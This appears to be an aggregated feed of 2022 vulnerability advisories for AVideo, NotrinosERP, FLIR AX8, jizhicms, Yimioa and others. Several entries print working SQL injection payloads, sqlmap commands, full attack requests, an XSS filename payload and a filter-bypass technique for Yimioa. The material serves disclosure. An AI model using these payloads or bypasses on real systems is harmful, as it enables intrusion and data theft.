An improper password check exists in the login functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. An attacker that owns a users' password hash will be able to use it to directly login into the account, leading to increased privileges.

**SUMMARY**

An improper password check exists in the login functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. An attacker that owns a users’ password hash will be able to use it to directly login into the account, leading to increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WWBN AVideo 11.6  
WWBN AVideo dev master commit 3f7c0364

**PRODUCT URLS**

AVideo - https://github.com/WWBN/AVideo

**CVSSv3 SCORE**

7.2 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-836 - Use of Password Hash Instead of Password for Authentication

**DETAILS**

AVideo is a web application, mostly written in PHP, that can be used to create an audio/video sharing website. It allows users to import videos from various sources, encode and share them in various ways. Users can sign up to the website in order to share videos, while viewers have anonymous access to the publicly-available contents. The platform provides plugins for features like live streaming, skins, YouTube uploads and more.

AVideo, by default, saves a user’s password as a salted hash in the database. When a user tries to login, the function login, defined in the User class in objects/user.php, is called:

    public function login($noPass = false, $encodedPass = false, $ignoreEmailVerification = false) {
        if (User::isLogged()) {
            return false;
        }
        ...
        if (strtolower($encodedPass) === 'false') {
            $encodedPass = false;
        }
        //_error_log("user::login: noPass = $noPass, encodedPass = $encodedPass, this->user, $this->user " . getRealIpAddr());
        if ($noPass) {
            $user = $this->find($this->user, false, true);
        } else {
            $user = $this->find($this->user, $this->password, true, $encodedPass);
        }
        ...
    

Password check is relayed to the find function, passing user and password as arguments:

    private function find($user, $pass, $mustBeactive = false, $encodedPass = false) {
        ...
        $sql = "SELECT * FROM users WHERE user = ? ";
        ...
        $sql .= " LIMIT 1";
        $res = sqlDAL::readSql($sql, $formats, $values, true);
        $result = sqlDAL::fetchAssoc($res);
        sqlDAL::close($res);
        if (!empty($result)) {
            if ($pass !== false) {
                if (!encryptPasswordVerify($pass, $result['password'], $encodedPass)) { // [1]
                    if (!empty($advancedCustom) && $advancedCustom->enableOldPassHashCheck) {
                        _error_log("Password check new hash pass does not match, trying MD5");
                        return $this->find_Old($user, $pass, $mustBeactive, $encodedPass);
                    } else {
                        return false;
                    }
                }
            }
            $user = $result;
        } else {
            _error_log("Password check new hash user not found");
            //check if is the old password style
            $user = false;
            //$user = false;
        }
        return $user;
    

The function fetches the user record from the database, and uses encryptPasswordVerify to check if the password matches:

    function encryptPasswordVerify($password, $hash, $encodedPass = false) {
        global $advancedCustom, $global;
        if (!$encodedPass || $encodedPass === 'false') {
            //_error_log("encryptPasswordVerify: encrypt");
            $passwordSalted = encryptPassword($password);
            // in case you enable the salt later
            $passwordUnSalted = encryptPassword($password, true);
        } else {
            //_error_log("encryptPasswordVerify: do not encrypt");
            $passwordSalted = $password;
            // in case you enable the salt later
            $passwordUnSalted = $password;
        }
        //_error_log("passwordSalted = $passwordSalted,  hash=$hash, passwordUnSalted=$passwordUnSalted");
        return $passwordSalted === $hash || $passwordUnSalted === $hash || $password === $hash; // [2]
    }
    

The password is encrypted in the same way it was stored in the database (using encryptPassword), however this function allows 3 different passwords to match: the salted hash of $password, the unsalted hash of $password, and whatever hash is stored in the database (the $password === $hash). This means that the hash as stored in the database can be used as a password to login. Any SQL injection vulnerability can thus be used to dump the administrator’s password hash and use that exact hash to login via the web interface.

**VENDOR RESPONSE**

Vendor confirms issues fixed on July 7th 2022

**TIMELINE**

2022-06-29 - Initial Vendor Contact  
2022-07-05 - Vendor Disclosure  
2022-07-07 - Vendor Patch Release  
2022-08-16 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-32282: TALOS-2022-1545 || Cisco Talos Intelligence Group

Personnel Property Equipment 2015-2022 suffers from a remote SQL injection vulnerability.

    ## Title: Personnel Property Equipment-2015-2022 SQLi,Unauthenticated-File-Upload## Author: nu11secur1ty## Date: 08.22.2022## Vendor Homepage: https://www.trickcode.in/## Video vendor: https://www.youtube.com/watch?v=ltSwom8sQAQ## Software https://www.trickcode.in/2021/03/personnel-property-equipment-system.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/trickcode/Personnel-Property-Equipment## Description:The parameter `username` is vulnerable to SQLi boolean-based blind andUnauthenticated-File-Upload.The attacker can take all information from this system by using thesevulnerabilities.Status: Highly Vulnerable[+]Payload:```mysql---Parameter: username (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=eFysrSeT''' OR NOT 4417=4417 OR'xXab'='cbaw&password=v9A!p7s!C0    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: username=eFysrSeT''' OR (SELECT 1050 FROM(SELECTCOUNT(*),CONCAT(0x7162716271,(SELECT(ELT(1050=1050,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR'wmfc'='yfBD&password=v9A!p7s!C0    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=eFysrSeT''' AND (SELECT 4473 FROM(SELECT(SLEEP(5)))Pghj) OR 'lxYt'='fefH&password=v9A!p7s!C0---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/trickcode/Personnel-Property-Equipment)## Proof and Exploit:[href](https://streamable.com/4yavk4)

Personnel Property Equipment 2015-2022 SQL Injection

The Better Search Replace WordPress plugin before 1.4.1 does not properly sanitise and escape table data before inserting it into a SQL query, which could allow high privilege users to perform SQL Injection attacks

CVE-2022-2593

Multiple SQL injections detected in Bus Pass Management System 1.0 via buspassms/admin/view-enquiry.php, buspassms/admin/pass-bwdates-reports-details.php, buspassms/admin/changeimage.php, buspassms/admin/search-pass.php, buspassms/admin/edit-category-detail.php, and buspassms/admin/edit-pass-detail.php

**Project Name**

Bus Pass Management System Project

**Language Used**

PHP5.6, PHP7.x

**Database**

MySQL 5.x

**User Interface Design**

HTML, AJAX,JQUERY,JAVASCRIPT

**Web Browser**

Mozilla, Google Chrome, IE8, OPERA

**Software**

XAMPP / Wamp / Mamp/ Lamp (anyone)

Bus Pass Management Project in Php is a web-based technology that will manage the records of the pass which is issue by administrative and also help to provide online bus pass to people who need to travel daily. Bus Pass Management System project is helpful to bus administration by reducing the paperwork, time consumption and makes the process of getting bus passes as simple and fast.

Bus Pass Management system uses PHP and MySQL databases. This is the project which keeps records of the pass which is issue by the administrative. Bus Pass Management system has two modules i.e. admin and user.

**Admin**

**Dashboard**: In this sections, admin can briefly view the total number of categories and how many passes will be generated in one day, yesterdays and the last seven’s days

**Category**: In this section, admin can manage the category (add/update).

**Passes**: In this section, admin can manage pass(add/update/take print pass).

**Pages:** In this section, admin can update about us and contact us pages.

**Enquiry:** In this section, admin reads the inquiries which are sent by users.

**Reports**: In this section admin can generate pass reports between two dates.

**Search**: In this section, admin can search a particular pass bypass number.

Admin can also update his profile, change the password and recover the password.

**User**

1.  **Home Page:** User can visit home page.
2.  **View Pass:** User can view his/her pass and take print with the help of their Pass Number.
3.  **About Us**: User sees the details of .website administrator.
4.  **Contact Us**: User can contact with website administrator.

**Note**:  In this project, the MD5 encryption method was used.

**Some of the Bus Pass Management Project Screens**

**Home Page**

**Home Page**

**Pass Details**

Pass Details

**Admin Dashboard**

**Admin Dashboard**

**Add/Create Pass**

**Add/Create Pass**

**How to run the Bus Pass Management System Project Using PHP and MySQL**

*   Download the zip file
*   Extract the file and copy buspassms folder
*   Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)
*   Open PHPMyAdmin (http://localhost/phpmyadmin)
*   Create a database with name buspassdb
*   Import buspassdb.sql file(given inside the zip package in SQL file folder)
*   Run the script http://localhost/buspassms

**Admin Credential**  
**Username:** admin  
**Password:** Test@123

**Pass number:** 681924385 or you can create a new pass.

**+++++++++++++++++View Demo+++++++++++++++++++++**

Download Full Source Code (Bus Pass Management System)

Size: 2.43 MB

Version: V 1.0

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.

CVE-2022-36198: Bus Pass Management System in Php | Bus Pass Management Project Using PHP

This will lead to privilege escalation from AP officers account to the System Administrator account. and gain more functionality such as Create/Update Companies. Install/Update Languages. Install/Activate Extensions. Install/Activate Themes. Install/Activate Chart of Accounts. Software Upgrade.

@@ -25,7 +25,7 @@ function can\_process() {

$Auth\_Result = hook\_authenticate($\_SESSION\['wa\_current\_user'\]->username, $\_POST\['cur\_password'\]);

  

if (!isset($Auth\_Result)) // if not used external login: standard method

$Auth\_Result = get\_user\_auth($\_SESSION\['wa\_current\_user'\]->username, md5($\_POST\['cur\_password'\]));

$Auth\_Result = authenticate\_user($\_SESSION\['wa\_current\_user'\]->username, $\_POST\['cur\_password'\]);

  

if (!$Auth\_Result) {

display\_error( \_('Invalid password entered.'));

@@ -57,7 +57,7 @@ function can\_process() {

if ($SysPrefs\->allow\_demo\_mode)

display\_warning(\_('Password cannot be changed in demo mode.'));

else {

update\_user\_password($\_SESSION\['wa\_current\_user'\]->user, $\_SESSION\['wa\_current\_user'\]->username, md5($\_POST\['password'\]));

update\_user\_password($\_SESSION\['wa\_current\_user'\]->user, $\_SESSION\['wa\_current\_user'\]->username, password\_hash($\_POST\['password'\], PASSWORD\_DEFAULT));

display\_notification(\_('Your password has been updated.'));

}

$Ajax\->activate('\_page\_body');

@@ -86,4 +86,4 @@ function can\_process() {

  

submit\_center( 'UPDATE\_ITEM', \_('Change password'), true, '', 'default');

end\_form();

end\_page();

end\_page();

@@ -20,7 +20,7 @@

  

page(\_($help\_context = 'Create/Update Company'));

  

$comp\_subdirs = array('images', 'pdf\_files', 'backup','js\_cache', 'reporting', 'attachments');

$comp\_subdirs = array('images', 'pdf\_files', 'backup', 'js\_cache', 'reporting', 'attachments');

  

simple\_page\_mode(true);

/\*

@@ -107,7 +107,7 @@ function handle\_submit($selected\_id) {

  

$conn = $db\_connections\[$selected\_id\];

if (($db = db\_create\_db($conn)) === false) {

display\_error(\_('Error creating Database: ') . $conn\['dbname'\] . \_(', Please create it manually'));

display\_error(\_('Error creating Database: ').$conn\['dbname'\].\_(', Please create it manually'));

$error = true;

}

else {

@@ -120,7 +120,7 @@ function handle\_submit($selected\_id) {

else {

if (!isset($\_POST\['admpassword'\]) || $\_POST\['admpassword'\] == '')

$\_POST\['admpassword'\] = 'password';

update\_admin\_password($conn, md5($\_POST\['admpassword'\]));

update\_admin\_password($conn, password\_hash($\_POST\['admpassword'\]), PASSWORD\_DEFAULT);

}

}

if ($error) {

@@ -350,4 +350,4 @@ function display\_company\_edit($selected\_id) {

  

end\_form();

  

end\_page();

end\_page();

@@ -112,12 +112,29 @@ function delete\_user($id) {

  

//-----------------------------------------------------------------------------------------------

  

function get\_user\_auth($user\_id, $password) {

function authenticate\_user($user\_id, $password) {

  

$sql = "SELECT \* FROM ".TB\_PREF."users WHERE user\_id = ".db\_escape($user\_id)." AND"

." password=".db\_escape($password);

$sql1 = "SELECT password FROM ".TB\_PREF."users WHERE user\_id = ".db\_escape($user\_id);

  

return db\_num\_rows(db\_query($sql, 'could not get validate user login for '.$user\_id)) != 0;

$result = db\_query($sql1, 'could not get user login for '.$user\_id);

  

if(db\_num\_rows($result) == 0)

return false;

  

$hash = db\_fetch($result)\[0\];

  

// The user's password hash may have been created long ago by md5 password algorithm on the old NotrinosERP versions

if(password\_verify($password, $hash) || $hash == md5($password)) {

if(password\_needs\_rehash($hash, PASSWORD\_DEFAULT) === true) {

$new\_hash = password\_hash($password, PASSWORD\_DEFAULT);

$sql2 = "UPDATE ".TB\_PREF."users SET password = ".db\_escape($new\_hash)." WHERE user\_id = ".db\_escape($user\_id);

db\_query($sql2, 'could not update password hash for '.$user\_id);

}

  

return true;

}

  

return false;

}

  

//-----------------------------------------------------------------------------------------------

@@ -56,12 +56,12 @@ function can\_process($new) {

update\_user\_prefs($selected\_id, get\_post(array('user\_id', 'real\_name', 'phone', 'email', 'role\_id', 'language', 'print\_profile', 'rep\_popup' => 0, 'pos')));

  

if ($\_POST\['password'\] != '')

update\_user\_password($selected\_id, $\_POST\['user\_id'\], md5($\_POST\['password'\]));

update\_user\_password($selected\_id, $\_POST\['user\_id'\], password\_hash($\_POST\['password'\], PASSWORD\_DEFAULT));

  

display\_notification\_centered(\_('The selected user has been updated.'));

}

else {

add\_user($\_POST\['user\_id'\], $\_POST\['real\_name'\], md5($\_POST\['password'\]), $\_POST\['phone'\], $\_POST\['email'\], $\_POST\['role\_id'\], $\_POST\['language'\], $\_POST\['print\_profile'\], check\_value('rep\_popup'), $\_POST\['pos'\]);

add\_user($\_POST\['user\_id'\], $\_POST\['real\_name'\], password\_hash($\_POST\['password'\], PASSWORD\_DEFAULT), $\_POST\['phone'\], $\_POST\['email'\], $\_POST\['role\_id'\], $\_POST\['language'\], $\_POST\['print\_profile'\], check\_value('rep\_popup'), $\_POST\['pos'\]);

$id = db\_insert\_id();

// use current user display preferences as start point for new user

$prefs = $\_SESSION\['wa\_current\_user'\]->prefs\->get\_all();

@@ -69,11 +69,11 @@ class current\_user {

  

// Use external authentication source if any.

// Keep in mind you need to have user data set for $loginname

// in FA users table anyway to successfully log in.

// in NotrinosERP users table anyway to successfully log in.

$Auth\_Result = hook\_authenticate($loginname, $password);

  

if (!isset($Auth\_Result)) // if not used: standard method

$Auth\_Result = get\_user\_auth($loginname, md5($password));

$Auth\_Result = authenticate\_user($loginname, $password);

if ($SysPrefs\->login\_delay > 0)

write\_login\_filelog($loginname, $Auth\_Result);

if ($Auth\_Result) {

@@ -151,7 +151,7 @@ class current\_user {

if ($user != false) {

  

$password = generate\_password();

$hash = md5($password);

$hash = password\_hash($password);

  

update\_user\_password($user\['id'\], $user\['user\_id'\], $hash);

  

**0 comments on commit 1b9903f**

Please sign in to comment.

CVE-2022-2921: changed password hash method from md5 to bcrypt. · notrinos/NotrinosERP@1b9903f

Project-nexus is a general-purpose blog website framework. Affected versions are subject to SQL injection due to a lack of sensitization of user input. This issue has not yet been patched. Users are advised to restrict user input and to upgrade when a new release becomes available.

**Impact**

_If a database query (such as a SQL or NoSQL query) is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries._

**Patches**

_Yet to be patched._

**Workarounds**

_Most database connector libraries offer a way of safely embedding untrusted data into a query using query parameters or prepared statements._

_For NoSQL queries, make use of an operator like MongoDB's $eq to ensure that untrusted data is interpreted as a literal value and not as a query object._

**References**

*   _Wikipedia: SQL Injection_
*   _MongoDB: $eq operator_
*   _Common Weakness Enumeration: CWE-89_
*   _Common Weakness Enumeration: CWE-90_
*   _Common Weakness Enumeration: CWE-943_

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in Project Nexus
*   Email us at zrexteam128@gmail.com

CVE-2022-36030: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') and Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') and Improper Neutralizatio

Apple Security Advisory 2022-08-18-1 - Safari 15.6.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-08-18-1 Safari 15.6.1

Safari 15.6.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213414.

WebKit  
Available for: macOS Big Sur and macOS Catalina  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited.  
Description: An out-of-bounds write issue was addressed with improved  
bounds checking.  
WebKit Bugzilla: 243557  
CVE-2022-32893: an anonymous researcher

Safari 15.6.1 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmL+gHUACgkQ4RjMIDke  
Nxm9eg/8CZFhmd5zgsQlwjn4R9kWVnIHCIzkhmjQGMzQ3C1FCiMwt+aDN2C1aYxN  
DiElfQy6ieI+4RNTxuNakhAQ0lS7F+TStHW9meblHkIA/qFfhBVxyaWZr+Hl0Bsw  
2K+0D9twK6xqh88hlvdm/GGEkEv8pKXKtzWaDoOdutXtasG6apc2nAMcqcWyN3SE  
hw+/PXhnxY5TNDQsz4wYsriichEPHIPJh3tCEgV2EvfsYx3GrX8Yga3T34GHwSj7  
H04Q3P1vNkdDDziFV7gZuWVXqKrpQxnReIKtZzffO0cW2x7lsSKw3H70yHlh2JLL  
yUDP28jJXOFGHD3izx+YHmFB4Q4dcHSVsil39Mq150s5iyJSkO2YDgWCyZBQ1tuB  
/dLIGuuQQtA3CqzBPSKneeeb0Cf5I6dnjh93R/aXLNiy+1AvizxJFOJ+EAlDCOxt  
o85iZxjWaGaQxng3qeA5nex5QWUvXRPyXoxyxnkfEeswv7PX6XLQXTASIo/Ug3E8  
KcIbtnkPatuwHt44eprrW6afaWhiY2IhiLKRFQeDm5vtYOr0FDAWGKl9bW203Frt  
2o6TVP9uXxZRIfMUmxBjdvNFScez49vlU6v+cIjj8UON/lWKZLkLDEFxfCWxlAWK  
eTc6a0tIAP5EMyd7EZdVhvxJSMxcCrXiO2iiS5TccIFZ5VvgZwA=t1cZ  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-08-18-1

FLIR AX8 versions 1.46.16 and below suffer from command injection, directory traversal, improper access control, and cross site scripting vulnerabilities.

# FLIR AX8 vulnerabilities.

### Product description:

The FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.

### Affected products:  
All FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

### Summary of the 4 vulnerabilities found / What we were able to find:

* [CVE-2022-37061] - Unauthenticated OS Command Injection.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter in `res.php` endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37060] - Unauthenticated Directory Traversal.

FLIR AX8 is affected by a directory traversal vulnerability due to an improper access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains directory traversal characters, to disclose the contents of files located outside of the server's restricted path. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

* [CVE-2022-37062] - Improper Access Control.

FLIR AX8 is affected by an insecure design vulnerability due to an improper directory access restriction. An unauthenticated, remote attacker can exploit this, by sending a URI that contains the path of the SQLite users database, and download it.  A successful exploit could allow the attacker to extract usernames and hashed passwords. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`. 

* [CVE-2022-37063] - Reflected cross-site scripting.

FLIR AX8 is affected by a reflected cross-site scripting (XSS) vulnerability due to an improper input sanitization. An authenticated, remote attacker can execute arbitrary JavaScript code in the web management interface. A successful exploit could allow the attacker to insert malicious JavaScript code. This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.

###  Step by Step Example (How to Reproduce and verify) the vulnerabilities:

1. Unauthenticated Remote Command Injection.

The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the POST parameter `id` can be injected to execute any Linux command. In the example below we create a crafted query that displays the contents of the `/etc/shadow` file.

The server returns a JSON response containing the contents of the `/etc/shadow` file.  This command injection is due because there no sanitization check on the variable `$_POST["id"]`, line 65, and can therefore take advantage of the `shell_exec()` function to execute unexpected arbitrary shell commands.

2. Unauthenticated Directory Traversal.

The endpoint `/download.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate. The second problem is that the GET parameter `file` can be injected with a relative file paths and download any files in the system. In the example below we create a crafted query that download the contents of the `/etc/passwd` file.

The error is due to the fact that there is no sanitization of the `$file_path` variable, line 26, when the `fopen()` function is called, line 39. However a comment in the code, line 24, and the use of the function `pathinfo()`, line 28, suggests that the developer thought about this problem and therefore created the variable `$path_parts` which is sanitized. But for some reasons the developer does not use the sanitizer variable `$path_parts` when the function `fopen()` is used. Probably an oversight.

3. Improper Access Control.

The endpoint `/FLIR/db/users.db` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID` to check if the request is legitimate and let any malicious actor to download the `users.db` SQLite database.

4. Reflected cross-site scripting.

In the settings tab, if a file with a filename that contains JavaScript code is selected via the update firmware file input the JavaScript code will be triggered and executed. In our example, we created a file call 

<img src=x onerror=alert(String.fromCharCode(97,108,101,114,116,40,39,116,101,115,116,39,41,59));>.run

### Recommendations for how to fix the 4 vulnerabilities:

* Vulnerability 1: The variable `$_POST["id"]`, line 65 in the file `/FLIR/usr/www/res.php`, must be sanitized using the function `intval()` and will remove any character other than integer value. `escapeshellcmd()` and `escapeshellarg()` must be also used to escapes any characters in a string that might be used to execute arbitrary commands. 

More info:   
https://www.php.net/intval  
https://www.php.net/manual/en/function.escapeshellcmd  
https://www.php.net/manual/en/function.escapeshellarg

* Vulnerability 2: The variable `$file_path`, line 39 in the file `/FLIR/usr/www/download.php`, must be sanitized using the function `pathinfo()` but also use a hard coded directory path, in case you need to manage several directories set a whitelist of all allowed directories and use multiple conditions.

More info:  
https://www.php.net/manual/en/function.pathinfo

* Vulnerability 3: Define a whitelist of all directories that a user is allowed to access. This can be added to the Lighttpd server configuration file, in `/etc/lighttpd.conf`.

More info:  
https://www.cyberciti.biz/tips/howto-lighttpd-enable-disable-directory-listing.html

* Vulnerability 4: To protect against filename XSS attack you can use a regex that will parse the filename to leave only numbers and letters.

More info:   
https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

### Reference:  
https://www.flir.com/products/ax8-automation/

### Security researchers:  
* [Thomas Knudsen] (https://www.linkedin.com/in/thomasjknudsen)  
* [Samy Younsi] (https://www.linkedin.com/in/samy-younsi)

FLIR AX8 1.46.16 Traversal / Access Control / Command Injection / XSS

jizhicms v2.3.1 has SQL injection in the background.

    POST /index.php/admins/Fields/get_fields.html HTTP/1.1
    Host: 192.168.10.130
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.10.130/index.php/admins/Comment/editcomment/id/3.html
    Content-Length: 24
    Cookie: language=en-gb; currency=USD; PHPSESSID=67c4b6e9ea40f3030a8987fcb94be158
    Connection: close
    
    molds=comment&tid=0&id=3
    

backstage->Interactive Management - > comment list, and grab a package  
  
  
use sqlmap: sqlmap -r test.txt --level 3 --random-agent --batch  

    ---
    Parameter: molds (POST)
        Type: stacked queries
        Title: MySQL >= 5.0.12 stacked queries (comment)
        Payload: molds=comment;SELECT SLEEP(5)#&tid=0&id=3
    ---

CVE-2022-36578: jizhicms v2.3.1 has a vulnerability, SQL injection · Issue #78 · Cherry-toto/jizhicms

Yimioa v6.1 was discovered to contain a SQL injection vulnerability via the orderbyGET parameter.

**ywoaSQL-Inject-Bypass****Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment

http://partner.yimihome.com/static/index.html#/index/sys\_env

**1, personnel - personnel information - orderbyGET parameter SQL injection**

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Bypass Payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment  
  
One-click installation, after the installation will prompt the system has expired, go to setup and take a look  
  
Until June 1, but it's okay, here to change the system time can be  
  
  
Login successfully

**Code audit****1\. Personnel - personnel information - orderbyGET parameter SQL injection**

  

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 192.168.0.35:9888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.35:9888/oa/swagger-ui.html
Origin: http://192.168.0.35:9888
Connection: close
Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 137

page=1&limit=20&realname\_cond=0&realname=test18&sex=&sex\_cond=1&dept=&dept\_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode=

**SQL injection Bypass**

The above injection payload is as follows

id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)

The environment here is from idea, but idea has a lot of error reports, many functions are not available, I changed to Windows one-click deployment  
  
After building it, debug it remotely with idea  
  
When you try to reproduce this vulnerability again, you will be prompted with an XSS interception  
  
  
It was curious at the time why this was XSS intercepted and not SQL intercepted? Look at the code  
  
The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic here  
  
Briefly, the main thing here is to get the values of the request parameters, and then pass them one by one to the following detection logic  
  
Since we just prompted for an XSS attack, we will follow directly into the method antixss to see the specific implementation logic  
Next you will come to Antixss.Java

    src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java
    

  
The antiXSS method is called by passing in the html to be detected and a true  
  
Follow directly in to see  
  
Check the \_antiXSS method, where the content is passed in is the content to be detected  
  
Here is the specific detection logic, but I'm only looking at the stripScriptTag method here, because it is the content inside this method that is detected, and our focus is only on what parameters are detected  
  
Mainly by means of regularity and case-insensitive because of CASE_INSENSITIVE  
  
Pull the following when you can see, in fact, and or sleep is filtered, create a new test class, and adjust it to know  
  
Remove AND  
  
The statement is normal, put back and remove sleep, the statement is normal, so since this is the case, replace and with &&, you can  
  
statement returns normally, then after returning here  
  
Returning to SecurityUtil.java, it will enter the logic of SQL injection, following the isValidSqlParam method  
  
Follow the sql_inj method  
  
We have already bypassed the detection of and and need to bypass the code logic in the second box  
  
The main logic here is to separate inj\_str using |, which will generate a list to inj\_stra\[\], and then iterate through the list, each loop will use the indexOf method to determine whether the value in inj\_stra\[i\] is in str, that is, if indexOf returns > 0 value exists, and vice versa, it does not exist, here you can also write a class tuned  
  
  
In the sixth loop, which is when select is detected, then it is obvious that you need to bypass select  
Here I was going to try to use

&& extractvalue(1,concat('~',database()))

Unfortunately, '~' will be detected as XSS, so this method does not work  
  
The && here needs to be converted to url encoding, otherwise this request will report 400  
  
So we can only think of ways to select this keyword, here is a bypass of the payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

  
Tips: Here just by looking at the screenshot you may think that you can bypass it with SELECT capitalization, but in fact it will be converted to lowercase before calling the sql_inj method  
  
So there is no way to capitalize to bypass

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

**Function implementation entrance**

  
  
First will get the get parameter code, if the code parameter is empty, then get the Get parameter moduleCode and assign it to code, if there is no moduleCode in the get parameter, then get the formCode and copy it to code, here the code parameter passed in is personbasic  
  
Continue to the next page  
  
